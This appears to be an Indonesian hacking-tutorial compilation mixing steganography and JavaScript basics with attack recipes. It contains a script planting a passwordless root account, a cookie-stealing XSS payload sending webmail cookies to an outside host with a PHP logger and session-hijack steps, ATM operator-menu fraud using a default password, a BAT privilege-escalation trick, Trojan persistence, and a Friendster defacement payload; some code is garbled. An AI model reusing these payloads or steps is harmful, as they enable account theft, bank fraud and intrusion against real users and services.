Professional Documents
Culture Documents
+ Hack Friendster
+ Hack Telphone Coin
+ Create Virus
Etc....
1. GIF Colourmap Steganography
GIF Colourmap Steganography adalah suatu teknik untuk menyembunyikan
pesan pada file gambar (dalam hal ini adalah format GIF - Graphic Interchange Format).
Sedikit cerita mengenai teknik ini, seorang ahli penyandian di Pentagon meyakini bahwa para
teroris, sebelum memulai aksinya dalam penyerangan ke WTC, saling mengirim pesan yang
disembunyikan di file-file gambar yang ada di situs porno, olahraga, dll.
Ide dari teknik ini adalah urutan dari warna-warna di peta warna (colourmap) pada sebuah file
GIF yang tidak mempengaruhi bagaimana gambar itu ditampilkan. Dua gambar dengan
urutan warna yang berbeda pada peta warna akan terlihat sama. Dengan demikian sebuah
gambar yang belum disisipi pesan dengan gambar yang sudah disisipi pesan akan terlihat
sama.
Sebuah program, bernama gifshuffle yang dibuat oleh Matthew Kwan, akan kita gunakan
untuk memperjelas teori diatas. Program ini bekerja dalam dua mode, yaitu : Message
Concealment (Penyembunyian Pesan) dan Message Extraction (Pengeluaran Pesan). Lebih
detail mengenai mode tersebut dapat dilihat dibawah :
Message Concealment : Message -> optional compression -> optional encryption ->
concealment in image
Message Extraction : Extract data from image -> optional decryption -> optional
uncompression -> message
Jika pembaca ingin mengetahui lebih rinci mengenai setiap proses dari dua mode diatas
dapat menghubungi penulis atau cari saja di Google.
Sekarang, untuk lebih jelas lagi penulis akan mencontohkan cara menggunakan program ini.
Pertama-tama kita memiliki gambar yang normal (belum disisip pesan) dengan format GIF,
seperti dibawah ini :
Sekarang kita akan gunakan program gifshuffle untuk memasukkan pesan, yaitu sebuah
string berisikan "gmt ganteng", dengan password "password", gambar yang telah disusupi
pesan akan kita beri nama baru yaitu "sun-m.gif". Perhatikan gambar dibawah ini :
Sekarang perhatikan bahwa gambar dibawah (sun-m.gif), yaitu setelah disusupi pesan, tidak
ada bedanya bukan dengan gambar yang normal ?
Misalkan sekarang gambar yang telah disusupi pesan telah dikirim, bagaimana caranya agar
orang yang menerima pesan tersebut dapat mengetahui isi pesan dibalik gambar tersebut ?
Caranya mudah, perhatikan gambar dibawah ini :
Terlihat bahwa pesan yang disembunyikan di gambar telah di-extract, yaitu "gmt ganteng".
Jika pembaca ingin memiliki program ini (baik source-code ataupun executeablenya dapat
menghubungi penulis atau cari saja di Google).
Mungkin sekarang pembaca mengira-ngira apakah gambar-gambar yang pembaca miliki ada
yang sudah disisipi pesan. Seorang hacker (penulis lupa namanya) telah membuat program
bernama StegDetect yang dapat mendeteksi apakah sebuah gambar memiliki pesan rahasia
didalamnya.
2. Windows Genuine Hack
Waktu hidupkan komputer, muncul peringatan “Microsoft Windows Genuine Advantage
Notifications”. Isinya : This copy of Windows is not genuine and you have not resolved the
issue. This computer is no longer eligible to receive select security upgrades from Microsoft.
To protect your computer, you must click Get Genuine now.
Mulanya kukira ini Adware.. ternyata tidak. Peringatan ini datang dari Microsoft dan terinstall
karena aku mengaktifkan Autoupdate.
Woww! Kontan tersinggung. Masa sih windows-ku nggak asli? Padahal sebelumnya, sistem
ini lulus uji bebas bajakan di situs microsoft. Marah-marah aku menuding mereka jual
software bajakan.
Setelah menyimpan kesal beberapa jam.. Akhirnya aku cari-cari tahu menghilangkannya.
Mencari file eksekusi, registri trus dll terkait. Ini harus dibuang, aku tak menginginkannya..
Akhirnya aku tahu, masalah serupa juga banyak menimpa komputer temanku. Mereka malah
membiarkannya begitu saja.... Alasannya tak tahu cara meng-enyahkan peringatan yang
mengganggu space kerja.
Meskipun aku menemukan beberapa cara melenyapkannya. Aku lebih percaya dengan cara
manual. Caranya:
- Ubah nama file berikut dengan ekstension .old : WgaLogon.dll, WgaTray.exe, keduanya
biasanya di temukan di C:\windows\system32\ (tergantung dimana sistem windows
tersimpan).
- Unregister file LegitControl.dll dengan Regsvr32. Caranya: masuk ke command prompt, Klik
start, klik run dan letik “cmd”, lalu klik OK.
Di command prompt, ketik: Regsvr32 c:\windows\system32\LegitCheckControl.dll /u, bila
caranya tepat.
- Klik Start, Run dan ketik cmd, lalu klik OK (kembali ke command prompt).
Tertawalah! Anda baru mengakali Microsoft, dan jangan pernah menginstal update serupa
dari microsoft!
3. User Undetected
Jangan pernah bermimpi masuk ke server orang jika kita blum mengetahui ajian yang
namanya rooting. Rooting adalah Melacak atau mamasuki server server orang yang punya
sistem yang lemah.
Tulisan ini diperuntukan buat orang yang udah punya akses superuser.
================================================
#!/bin/bash
#kill bill
#f*** bill
set kollo = (`grep kollo /etc/passwd`)
set kolot = (`grep kollo /etc/shadow`)if ($#kollo == 0) then set linecount = `wc -l /etc/passwd`
cd cp /etc/passwd ./temppass @ linecount[1] /= 2 @ linecount[1]
+= 1 split -$linecount[1] ./temppass echo "kollo:x:0:520:b-gildrake:/root:/bin/bash" >> ./xaa
cat ./xab >>./xaa mv ./xaa /etc/passwd chmod 644 /etc/passwd
rm ./xa* ./temppass passwd -d kollo echo good girl you root access is kollo else echo login
masih ada echo grep kollo /etc/passwd endifif ($#kollo == 0) then
set linecount = `wc -l /etc/passwd`
cd
cp /etc/passwd ./temppass
@ linecount[1] /= 2
@ linecount[1] += 1
split -$linecount[1] ./temppass
echo
"kollo:x:0:520:b-gildrake:/root:/bin/bash" >> ./xaa cat ./xab >>./xaa mv ./xaa /etc/passwd
chmod 644 /etc/passwd rm ./xa* ./temppass
passwd -d kollo echo good girl you root access is kollo else echo login masih ada echo grep
kollo /etc/passwd endif
if ($#kolot == 0) then
set linecount = `wc -l /etc/shadow`
cd
cp /etc/shadow ./temppass
@ linecount[1] /= 2
@ linecount[1] += 1
split -$linecount[1] ./temppass
echo
"kollo:11614:0:99999:7::::" >> ./xaa
cat ./xab >>./xaa
mv ./xaa /etc/shadow
chmod 644 /etc/shadow
rm ./xa* ./temppass
echo good girl you root access is kollo
else
echo login masih ada
echo grep kollo /etc/shadow
endif========================================================:wq
ok deh slamat menikmati akses kollo anda okeyyyyy
4. Plasa.com/Telkom.net Hack
Plasa.com adalah sebuah website yang menyediakan cukup banyak layanan, dan sepertinya
merupakan sebuah affiliates inti Telkom.net (PT. Telekomunikasi Indonesia). Walaupun
keduanya diketahui sebagai website besar, yang juga dipercaya memiliki security yang bisa
dikatakan baik (Mengingat mereka adalah perusahaan komunikasi terbesar Indonesia),
kenyataan ternyata berbicara lain.
Terhitung pada hari ini (17 October 2006), Th0R bersama dengan SATE (Security Advisory
TEam), telah menemukan beberapa kebocoran yang cukup signifikan dalam keamanan pada
kedua website tersebut. Pada kesempatan kali ini, kita akan coba membahas mengenai
kebocoran yang ada pada website mereka ..
Memang baik bagi telkom maupun plasa.com untuk membuat fitur HTML lgsg pada email
mereka, lagipula mereka memang melakukan pengamanan pada penggunaan HTML di inbox
mereka sendiri, dengan melakukan filtering beberapa codes yang ada ..
Namun, sesuai dengan legenda yang telah sering terhembuskan oleh angin, XSS (Cross Site
Scripting), ternyata memang benar adalah sebuah serangan yang paling mengerikan yang
pernah ada. Walaupun sudah di filter sedemikian rupa, perusahaan raksasa di Indonesia
(Telkom), ternyata masih memiliki fungsi Human Error, yang membuat mereka lupa
melakukan filtering pada beberapa fungsi lain yang bisa dikatakan memang tidak begitu BISA
untuk di execute ..
Apabila kalian login masuk ke dalam WebMail mereka, baik telkom.net maupun plasa.com
ternyata mereka masuk ke dalam satu server yang serupa, dan tentunya segala sesuatu nya
juga bisa dikatakan serupa .. Sehingga KEBOCORANNYA pun serupa .. Hehehe ..
<pre a='>'
onmouseover='document.location="http://shinigami.byethost32.com/c.php?c="+document.co
okie' b='<pre' >
</pre>
Dan mengirimkannya dengan modul HTML seperti yang disediakan oleh pihak mereka sendiri
di webmailnya ..
Maka setiap orang yang membuka email mereka dan melewatkan Crusor keatas email
tersebut, cookies nya akan ter-record melalui c.php yang telah saya pasangkan ..
<?php
$cookie = $_GET['c'];
$ip = getenv ('REMOTE_ADDR');
$referer=getenv ('HTTP_REFERER');
fwrite($fp, 'Cookie: '.$cookie.'<br> IP: ' .$ip. '<br> Date and Time: ' .$date. '<br> Referer:
'.$referer.'<br><br><br>'); fclose($fp); ?>
Penggunaan Exploit
4. Simpan dengan nama c.php .. (Atau nama apa saja dengan format: <nama>.php) 5.
Setelah itu, buatlah sebuah text file kosong dengan nama cookies.txt 6. Hostingkan ke 2 nya
dalam sebuah hosting yang mengijinkan PHP codes .. (Contoh
[URL=http://www.byethost.com)]http://www.byethost.com)[/URL]
<pre a='>'
onmouseover='document.location="http://shinigami.byethost32.com/c.php?c="+document.co
okie' b='<pre' >
</pre>
12. Check lah kalau kalau ada logged cookies di cookies.txt anda yang telah terhostingkan ..
13. Dan apabila ada muncul yang kira kira seperti ini:
http://mail1.plasa.com/Session/227502-UPcQoxKIVTIeAXZisu91-
kmbcuwc/Message.wssp?Mailbox=INBOX&MSG=7&PrintVersion=& :: plasaUserID=th0r;
plasaFullName=Rex Carlton; plasaUniqId=8d18f0e0e0e78f5816095b36abad73b0;
validUser=734c2b0266483d6540855081d8ed7e15
15. Lakukan cookie editing, dan mengganti plasaUserID, plasaFullName, plasaUniqID, dan
ValidUser sesuai dengan yang anda dapatkan dari target anda ..
Seperti yang kita ketahui, sebagian orang mgkn menggunakan password pada beberapa
account penting mereka dengan password yang sama .. So, untuk mendapatkan plain-text
password, kalian bisa melakukan sedikit Social Engineering, dengan melakukan lupa pas,
pada Friendster.com misalnya, atau web lain, yang nantinya membuat plain-text password
mereka terkirim ke alamat email mereka di plasa.com atau telkom.net itu sendiri ..
Ternyata, plasa.com dan telkom.net memberikan Semua Informasi penting dan tidak penting
yang tercantum pada profile anda, tanpa encryption method, lgsg pada bagian Edit Profile ..
Hal ini membuat para penyerang mampu mendapatkan Secret Question dan Answer nya, lalu
memungkinkan mereka melakukan Lupa Password ..
Catatan Penting
- Perlu diingat bahwa ini bukanlah satu2nya vulnerabilities yang ada pada plasa.com ataupun
telkom.net
- Penggunaan HTML pada body email juga bukan merupakan satu2nya kelemahan
- Mohon agar Telkom.net dan Plasa.com melakukan re-check terhadap keamanan mereka,
dan melakukan filtering yang lebih terhadap penggunaan HTML di dalam email mereka ..
- Hilangkan segala jenis XSS yang bekerja pada website mereka (Sejauh ini terdapat puluhan
XSS working on their site).
5. Registry
Mungkin sudah banyak artikel yg memuat tentang registry windows.Tulisan ini saya buat
selaku seorang newbie (tapi sok tau), itupun akibat kejengkelan dengan salah satu warnet di
Bogor dan salah satu sekolah saya. Semua fasilitas diproteksi, mulai dari regedit, Control
Panel, CMD, Drive, bahkan floppy A-nya pun di ambil. Disini saya akan memulai dari awal.
Yaw DAH, Kita mulai dari awal yaitu hal yg paling menjemukan yaitu teori......
Registry merupakan kumpulan dari data windows yang dipakai untuk mengatur jalannya
sistem operasi windows. Untuk melakukan perubahan pada windows menggunakan program
regedit. Caranya RUN lalu ketik regedit. Akan terlihat 6 root keys yang mempunyai tugas
yang berbeda setiap key (mungkin tidak perlu dijelaskan satu persatu biar gak bosen
bacanya, setuju?). Klo gak dijelasin gak belajar namanya he...he...
nah klo yang ini bisa bikin semua isinya yang ada di drive-Nya ga Kliatan (he...he...^_^)
2. Mendisable akses untuk melihat drive
Key"HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer
" or bisa JuGa
key"HKEY_USERS\S-1-5-21-776561741-823518204-725345543-
1004\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer"
Value "NoViewOnDrive"
Tipe data "DWORD"
1. MenDisable CMD
key "HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\System"
Value "DisableCMD"
Tipe data "DWORD"
Untuk menormalkan semua perubahan yang dibuat tinggal mengganti nilai 1 atau lainnya
menjadi nilai 0
6. Injection Failed
Saya nyiptain istilah baru nih "textbox injection", atau mungkin sudah ada istilah lain tapi aku
gak tahu. (Sialan !!! Ternyata aku masih bego)Setelah beberapa saat jalan-jalan di internet,
dan mampir ke beberapa situs yang menggunakan textbox untuk menerima inputan atau
masukan dari pengunjung (seperti pada buku tamu/guestbook, forum, kritik dan saran, dll)
saya masih menemukan beberapa yang tidak melakukan validasi input untuk textbox yang
digunakannya. Masukan dari pengunjung diolah begitu saja tanpa diubah sama sekali.
Sebagai contoh, saya menemukan celah ini di situs harian Batam Pos
(www.harianbatampos.com) pada bagian pemasangan iklan gratis, atau pada situs
www.ibatam.com pada bagian direktori bisnis (memasukkan nama dan deskripsi
perusahaan). Jika saya memasukkan input "<h1>test" misalnya, maka yang akan tampil
adalah tulisan kata "test" dengan ukuran besar (ukuran terbesar untuk format html), bukan
tampilan seperi tulisan aslinya. Coba bayangkan jika pengunjung memasukkan input sebagai
berikut :
"<img src=http://www.porno.com/porno1.jpg>"
bukankan akan tampil gambar porno disana (pernah terjadi lho). Tentu saja pengunjung lain
akan tercengang melihatnya.
Hal seperti ini saharusnya tidak boleh terjadi, jika sang admin melakukan validasi input untuk
semua data yang masuk. Eh tapi ada cerita unik lain lagi lho. Saat saya mengunjungi salah
satu situs resmi pemerintah, kalau nggak salah www.drpin.go.id. Sewaktu saya berusaha
untuk memasukkan input <h1>test, muncul peringatan bahwa pengunjung dilarang
memasukkan tag html ke dalam textbox. Lalu saya berfikir, "wah... ini pasti menggunakan
javascript !". Dan ternyata setelah saya melihat source code-nya tebakan saya tadi benar,
kemudian saya edit halaman dengan menghilangkan script-nya. Dan ternyata berhasil, tulisan
<h1>test
yang saya masukkan ditampilkan dengan ukuran jumbo, hehehe. (Maaf ya Mr.Admin, saya
cuma nge-test aja kok)
SOLUSINYA
Agar hal seperti di atas tidak terjadi lagi berikut ini salah satu solusi yang saya tawarkan :
1. Jika yang digunakan untuk server side scripting adalah PHP, manfaatkan saja fungsi
"htmlspecialchars" atau "get_html_translation_table". Dengan menggunakan fungsi ini maka
semua input yang berbentuk tag html akan diubah menjadi karakter lain. Misalnya karakter
"<" akan diubah menjadi "<" sehingga saat
inputan tersebut ditampilkan di browser tetap akan berbentuk "<".
-----------------------------start----------------------------------------<?
$str= htmlspecialchars("<a href='test'>Test</a>"); echo($str); ?-----------------------------finish-
--------------------------------------
Simpan sebagai file php dengan nama test.php, agar hasilnya bisa ditampilkan di halaman
yang sama. Jangan lupa untuk menyimpannya di direktori htdocs. Kemudian coba akses file
tersebut menggunakan browser dan masukkan tag html ke dalam textbox misalnya "<h1>A",
dan lihat apa yang terjadi.
Udah dulu ah, kalau sebelumnya udah ada yang menulis artikal seperti ini, saya mohon maaf.
Tapi yang jelas ini adalah hasil pencarian saya sendiri lho.
7. ATM Hack
Seperti yang sudah di janjikan ..Mari kita membahas mengenai Hacking mesin ATM dengan
menggunakan real programming hack .. Hehehe ..
Sebuah mesin yang kayaknya udah gak perlu diceritain lagi deh apa dan bagaimananya,
karena saya rasa semua orang sudah tahu mengenai mesin ini ..
Yang jelas dengan mesin ini, kalian bisa mengambil duit, tanpa harus pergi ke bank dan
melakukan banyak hal lain yang menurut saya pribadi adalah melelahkan .. Ngisi form lah,
apalah .. Capek dude xD~~
Nah, sering kali tuh terjadi rumor .. Bisa gak sih ATM di Hack??!
Gimana sih caranya?? Dalam kesempatan kali ini, saya akan membuat sebuah tutorial dan
artikel bersifat informatif singkat berkenaan dengan kemungkinan hacking ATM Machine itu
sendiri .. Sebenarnya ada banyak cara, dan kebanyakan cara bisa anda lihat di
http://www.sate.name .. Tapi dalam kesempatan kali ini, saya akan sedikit membahas
mengenai masalah teknis yang ada xD~~
Hal ini hanya bekerja untuk mesin tipe Tranax Minibank 1500 Series ..
Kalau anda teliti .. Anda bisa mendapatkan sebuah informasi penting dari series yang saya
berikan diatas xD~~
To access the Operator Function menu, hold the <Cancel>, <Clear> and <Enter> keys
simultaneously for 2 seconds, release them and press 1, then press 2, then press 3. The
timing of this procedure can be difficult at first.
Jadi intinya untuk masuk kedalam Operator Function pada ATM Machine tipe ini, anda perlu
menekan tombol <Cancel>, <Clear> dan <Enter> secara bersamaan selama 2 detik,
lepaskan mereka, dan tekan tombol 1, kemudian 2, dan 3. Mungkin timing awalnya akan
susah pada saat anda mencoba pertama kali .. xD~~
Matikan power ATM mesin, buka saja penutup ATM, copot kertas untuk printernya,
pasangkan kembali, dan pada saat anda menyalakan kembali ATM, dia akan lgsg masuk
pada Operator Function ..
Susah memang ..
Pada mesin Tranax MiniBank 1500 Series .. Default Master Password nya adalah "000000"
(Tanpa kutip) .. Dan saya rasa tidak banyak yang merubah default password itu, Hehehe ..
Termasuk diantaranya "reset the status of the cash cartridges" .. Yang dimana membuat
anda mgkn saja melakukan pengambilan uang sebesar 100rb namun anda mendapatkan
400rb karena anda membuat cashingnya menjadi 4x lipat lebih banyak .. Namun bank akan
hanya me-reduce uang anda sebanyak 100rb sesuai request anda .. Hehehehe ..
Menarik bukan??!
Wakakaka ..
Dengan Master Password, anda bisa merubah jam transaksi, merubah entire timing dan
printing data ATM, dll dsb dst .. Yah, kreasikan sendiri utk bisa kabur dr tuduhan .. Jadi
intinya, yang perlu anda takuti adalah .. Security Cameras
NB: Tutorial ini hanya dibuat untuk pembelajaran dan pembuktian bahwa ATM Hacking itu
mgkn terjadi. Oleh dari karena itu kami tidak membahas jauh lebih men-detail, berikut juga
merupakan sebuah bukti bahwa "Lubang" keamanan ini sedang sedemikian rupa di patch
oleh pihak Tranax: Baca Disini!!! .. Sekian
8. Hacking Software
Pada umumnya sebuah software normal tipe 32-bit terbagi menjadi beberapa bagian,
bagian yang umum adalah resource, bagian dimana icon gambar dan yang lainnya disimpan,
kemudian data, bagian dimana variabel yang terinisialisasi disimpan dan kode, dimana
program utama dijalankan.
Program Com mempunyai bagian yang paling sederhana dari semua jenis executable
atau file yang bisa dilaksanakan/jalankan. Data yang terinisialisasi oleh Com exe dengan
yang tidak, akan dianggap sama. Umumnya untuk menghemat ukuran, software selalu tidak
menyertakan seksi stack pada badan program, tetapi memberikannya setelah program
dijalankan.
Software yang saya niatkan untuk dibuat akan mempunyai tata letak atau bagian seperti ini.
1024 byte pertama yang biasanya di isi oleh header pada Win32, akan saya jadikan sebuah
perintah untuk melakukan penginisialisasian program secara automatis.
ORG 100h
jmp start
CSPmode:
and al,1
cmp al,1
jz trs
inc cx
ret
start:
call CSPMode
cmp al,0
jz brs
mov ah,9
int 21h
brs:
ret
Bila anda kebetulan mempunyai sebuah komputer kosong yang tidak mempunyai
OS, dengan menuliskan program tersebut di sektor 1, head 0 dan track 0, dan setting BIOS
diganti menjadi boot from A. Maka BIOS akan langsung menjalankan program dan
menganggap program tersebut sebagai Operating System. Sekali lagi saya ingatkan, hacking
bukan cracking (seperti menjebol sebuah system dan sejenisnya).
Program diatas saya tulis dengan menggunakan Emu8086 v.2.7. Terlihat diatas adanya
sebuah variable dengan nama SMSW_AX dan LMSW_AX. Variabel tersebut memang
sengaja saya buat, karena emu8086 yang saya pakai belum mendukung instruksi priviledge.
Org 100.
Org singkatan dari Origin, perintah ini tidak mempunyai opcode atau hexcode. Perintah ini
hanya akan menyuruh assembler atau kompiler untuk menyimpan program kita di alamat
tertentu.
Jmp Start.
SMSW_CX.
Ini adalah variabel yang mengandung opcode priviledge instruction untuk mengambil
mode prosesor.
Mov ax,cx.
and al,1
Membatasi nilai al dengan satu, karena status mode terletak di Bit Nol.
cmp al,1
jz trs
inc cx
lmsw_cx db 0fh,01,0f1h
trs:
ret
Label dengan nama trs. Menyuruh prosesor untuk kembali ke pemanggil.
start:
call CSPMode
cmp al,0
jz brs
Jika ya beres.
mov ah,9
int 21h
Interupt Software, Tidak akan berjalan tanpa DOS. Fungsi asli sedang dibuat.
brs:
ret
Untuk kembali dan variabel tulisan yang ditampilkan dengan int 21h fungsi 9h.
Catatan:
0102: 0F 01 E1 ó SMSW CX
010b: 74 04 ó JZ 0x111
010d: 41 ó Inc CX
010E: 0F 01 F1 ó LMSW CX
0111: C3 ó Ret
0117: 74 07 ó Jz 0x120
0120: C3 ó Ret
............................
............................
............................
Perintah pemanggilan fungsi ke 0x102, tidak ditulis EB 02 01, tetapi EB ED FF yang berarti –
20 atau -0x14. Juga JZ. Maka baik perintah jump ataupun Call sama dengan CS+imm. Jika
CS bernilai 101, dengan menuliskan 74 05 misalkan. Kita akan melompat ke alamat 106.
Juga baik Call ataupun Jmp, menggunakan nilai Signed. Misalkan nilai 254 pada unsigned
akan menjadi –2. Untuk lebih lengkapnya tentang un/signed, silahkan tanya saja ke
Sto@jasakom.com , atau baca buku yang dikarang oleh orang yang sama.
9. Stenografi
Steganography adalah sebuah seni menyembunyikan informasi sedemikian sehingga tidak
dapat dideteksi/diketahui. Steganography, dalam bahasa aslinya (yaitu Yunani) berarti
"tulisan tersembunyi".
Steganography sudah ada dari sejak lama, tapi aplikasinya pada masa itu masih sangat
sederhana sekali, seperti membuat tinta yang hanya terlihat jika diterangi sinar lilin, membuat
penonjolan huruf pada posisi tertentu, dll. Pada saat ini aplikasinya sudah demikian canggih,
seperti menyembunyikan pesan di file teks ASCII biasa (di Notepad), menyembunyikan
pesan di file lagu MP3, menyembunyikan pesan di file gambar berformat GIF, dll.
Contoh Steganography yang saya bahas kali ini adalah SNOW. SNOW digunakan untuk
menyembunyikan pesan pada file teks ASCII dengan menambahkan whitespace pada akhir
baris, sehingga dikenal juga dengan Whitespace Steganography. Salah satu kelebihan dari
SNOW adalah penggabungan Steganography dan Cryptography, sehingga proses
penyembunyian informasi menjadi semakin sulit dideteksi. Pertama-tama, informasi yang
akan disembunyikan dienkrip dengan menggunakan algoritma enkripsi ICE, lalu kemudian
informasi tersebut disembunyikan di file teks ASCII.
Gambar pertama adalah file teks ASCII yang akan kita susupi informasi. Perhatikan warna
biru ketika dilakukan "select all". Lalu perhatikan gambar kedua, yang merupakan file teks
ASCII yang sudah disusupi informasi rahasia (yaitu "Majulah Indonesia"), ketika di-"select all"
tampak ada tambahan whitespace dibelakang tiap baris. Nah, disitulah pesan rahasia kita
berada.
Berikut adalah gambar proses-nya. Program yang digunakan dibuat memakai bahasa
pemrograman Java 1.1. Program tersebut dapat didownload pada situs
http://www.darkside.com.au/snow/index.html .
Demikianlah penjelasan singkat dari saya. Semoga dapat menambah pengetahuan pembaca
sekalian. Untuk pembahasan mengenai Steganography lainnya dapat pembaca cari melalui
Google.
10.Trojan
Apakah sebenarnya trojan itu ? Bagaimana cara kerjanya ? Nah, di sini akan saya sharing
sedikit informasi mengenai trojan. Hal pertama yang perlu anda ketahui adalah pengertian
tentang trojan ini. Ada beberapa point yang perlu di lihat :
1. Trojan merupakan tool yang dapat digunakan untuk memonitoring mesin lain. Pengertian
umum dapat di katakan sebagai kamera yang tersembunyi yang di tempatkan di komputer
target.
2. Trojan bukanlah hacking tools. Hanya saja sebagai pelengkap dalam langkah hacking.
3. Begitu anda dapat masuk ke system target, maka anda dapat memasukkan trojan ini untuk
kelanjutan memonitoring, mengotrol dan mencuri password di mesin target.
Perlu anda ketahui bahwa FBI ingin mengimplementasikan Carnivore yang berguna untuk
sniffing/mengetahui informasi email orang yang dimaksud, so apakah setiap orang setuju
akan hal ini, tentu saja tidak ? Begitu juga dengan trojan, anda dapat menggunakannya untuk
memonitoring target, apakah temen ataupun BOS. Tujuan setiap orang dalam memakai
trojan tentunya berbeda-beda.
Asal muasal istilah Trojan Horse berasal dari Yunani di mana diceritakan para perjuang yang
bersembunyi di dalam kuda trojan yang terbuat dari kayu yang sangat besar. Mereka
kemudian akan keluar dari kuda kayu tsb setelah dikira pergi dari daerah tsb dan menyerang
ke target-target yang ditentukan. Dan kemudian para pejuang itu akan memberikan jalan
kepada para penjuang lain yang akan menyerang.
Trojan dikelompokkan dalam jenis malware yaitu automated-program atau program yang
dapat hidup sendiri.Trojan ini juga dianggap destruktif, hanya saja ia tidak seperti virus yang
menyebarkan diri sendiri. tetapi akan terdeteksi sebagai virus.
Cara kerja trojan sebenarnya cukup simple, hampir sama dengan dengan aplikasi
Client/Server. Dimana perlu adanya program di server yang listen ke port tertentu dan
kemudian anda dapat menggunakan Client application untuk connect ke port tsb.
Program Server ini yang akan di tempat kan di mesin target, jika program ini telah aktif maka
ia akan tersembunyi di dalam memory dan mengubah beberapa seting di mesin target. Untuk
menjalankan program Server ini ada beberapa cara, melalui autoexec.bat, win.ini, ataupun
file sejenis lainnya yang dijalankan pada saat mesin target di start. Adapun yang paling umum
adalah menempatkannya di registry, khususnya di windows, yang akan terlihat seperti :
[HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run]
"Server"="C:\\WINDOWS\\server.exe"
Program tsb tidak akan terlihat oleh user, program ini akan dapat mengambil password ,
setting mail, IP dan port number. Dengan adanya program server (trojan) ini yang telah aktif
di computer target, maka anda dapat melakukan connection dengan menggunakan program
remote(client) dan tentu saja anda dapat melakukan banyak hal tergantung banyaknya
fasilitas yang ada di dalam trojan tsb.
http://www.sinred.com
http://www.tlsecurity.com
http://www.y3knetwork.org
http://bionet.tlsecurity.com
http://www.infernoindustries.cjb.net
http://www.sub7.slak.org
http://www.cultdeadcow.com
11. Javascript
Sampai lah saatnya pada Javascript tutorial di publish pada hari ini.
Berikut ini perkenalan terlebih dahulu, nantinya akan diteruskan ke lebih dalam.
Tips dan trik juga dibahas pada tutorial ini.
I. Pembukaan
JavaScript hanya bisa dilihat pada browser2 tertentu dan berikut versinya. Seperti browser
Netscape Navigator dari versi 2.0 sampai versi terbarunya 4.x, dan Internet Explorer dari
versi 3.0 sampai versi terbarunya 5.x. Tapi browser standard untuk Windows CE (MPIE -
Microsoft Pocket Internet Explorer) belum mendukung JavaScript, mungkin nanti di versi
berikutnya.
Perlu diketahui bahwa JavaScript di dalam HTML, XML, dan WML, tetap bisa di "View
Source" alias di "Copy & Paste" untuk di pakai.
Kecuali mungkin dengan cara "Hide" atau meniadakan Menu di browser sehingga "Source
Code" dapat disembunyikan dengan aman.
Tips:
- "Disable Right Click" JScript
- "Full Screen Window" JScript
II. Pemakaian
Contoh:
<script language="JavaScript">
<!--
document.write("Test");
//-->
</script>
Dan kalau "Script" nya kita taruh terpisah di file lainnya yang selalu berakhiran ".js" bisa
langsung kita panggil dengan perintah berikut ini:
contoh:
http://www.victim.com/test.js
Diingat bahwa penulisan script selalu diawali dengan "<!--" dan ditutup dengan "//-->".
Alasannya karena untuk menghindari tidak terbacanya script tersebut di browser yang kuno
(belum / tidak pernah diupdate)
Contoh: windows 95, bawa browser IE ver. 3.51 dan si user nggak pernah update OS dan
browsernya.
Untuk Variable, Operators, dan Expressions nya sama dengan prinsip program lainnya.
Untuk statement nya, selalu dibuka dengan "{" dan ditutup dengan "}" Dan setiap perintah
selalu ditutup dengan ";"
contoh:
if (blah..blah)
{
blah..blah;
}
else
{
blah..blah;
}
Mengenai Object yang dapat dipakai, kita bisa lihat di DOM (Document Object Model).
Object-object tersebut dapat kita pasang didalam script untuk menambah fungsi-fungsi
tertentu yang tidak perlu kita tulis dalam script lagi. Fungsi dan method nya sama dengan
perintah yang kita jumpai di dalam ASP (Active Server Pages).
contoh:
window.close();
contoh:
nama = "NamaTest";
if (nama!='')
{ return nama; }
contoh:
function tampilan(nama)
{
blah..blah
}
Untuk Event Handler nya kita bisa panggil langsung didalam sintax html
contoh:
<a href="blah..blah" onMouseOver="TestFunction();">
Test </a>
Perlu diingat, untuk object-object dan "Event Handler" yang dipakai, perlu kita sesuaikan
dengan type browsernya (Internet Explorer atau Netscape), karena ada yang bisa dipakai
untuk 2 browser tersebut, dan ada juga yang harus kita spesifik
ke type browsernya.
12. Jadi Admin XP
Sedikit mempersimpel tulisan dari Al-k pada 16 mei 2006 tentang cara lain menjadi
administrator pada win-xp sp1 dan sp 2.
Ada trik yang lebih sederhana tapi nggak jauh beda dari tulisan al-k beberapa bulan lalu
….eehm…tapi beda nya disini kita nggak perlu tools apapun…hanya perlu kesabaran dalam
menanti..
@echo off
Net localgroup administrator guest/add
Exit
Sudah itu simpen script diatas dengan ekstensi BAT (namanya terserah temen-temen deh
ex:system.BAT,…ingat harus BAT..)
Ini letak persamaan dari tulisan al-k,temen-temen harus sabar menunggu sampai sang admin
menjalankan Komputer agar file bat yang tadi anda buat berjalan..
Kalau trik temen-temen berhasil kita bisa periksa status kita dengan perintah net user
guest.dan temen-temen bisa lihat status di local group membership,..Mudah bukan.. :)
namanya juga jadi admin secara illegal jadi harus sabar..hehehe..klo mau cepet minta aja
buatin account ama adminnya..huahaaahaahaaa….
13. Friendster Injection
Pertama-tama lo cari target lo dulu...(acc fs yg udah masuk friendlist fs lo)
trus...kasih dia testi dengan kata kata lo,,trus masukkin kode dibawah :
___BEGIN OF TESTIMONIAL____
eh...apa kabar?
<img src="" id="mycode"
style="height:expr/**/ession(if(pageViewerID!=pageOwnerID){document.write('<body
bgcolor=black><b><br><br><center><font face=verdana size=4pt
color=white>maaph..<br>tapi account fs yg anda liat uda gua
bajak..<br><br>bingung?<Br>ngapain juga..<br><Br><br><br>nobodys servers is
safe..<br><br><br>T_F_M #kartubeben<br>@ Dalnet Server<br></b>');document.title = '-
friendster gua bajak !!-'}); width:expr/**/ession(document.all.mycode.style.height='0px')"
/></img>
___END OF TESTIMONIAL______
perhatikan:
<img src="" id="mycode" style="height:expr/**/ession(
if(pageViewerID!=pageOwnerID)
fungsi diatas untuk mencegah agar yg punya fs gak
bisa ngliat klo profilenya udah berubah...
jadi perubahan ini cuma bisa dilihat sama orang lain,kecuali pemiliknya.
lalu,
document.write('<body bgcolor=black><b><br><br><center><font face=verdana size=4pt
color=white>maaph..<br>tapi account fs yg anda liat uda gua
bajak..<br><br>bingung?<Br>ngapain juga..<br><Br><br><br>nobodys servers is
safe..<br><br><br>T_F_M #kartubeben<br>@ Dalnet Server<br></b>');document.title = '-
friendster gua bajak !!-'});
script diatas adalah script javascript yg fungsinya untuk menuliskan tag html semau kita
kedalam sebuah testi...
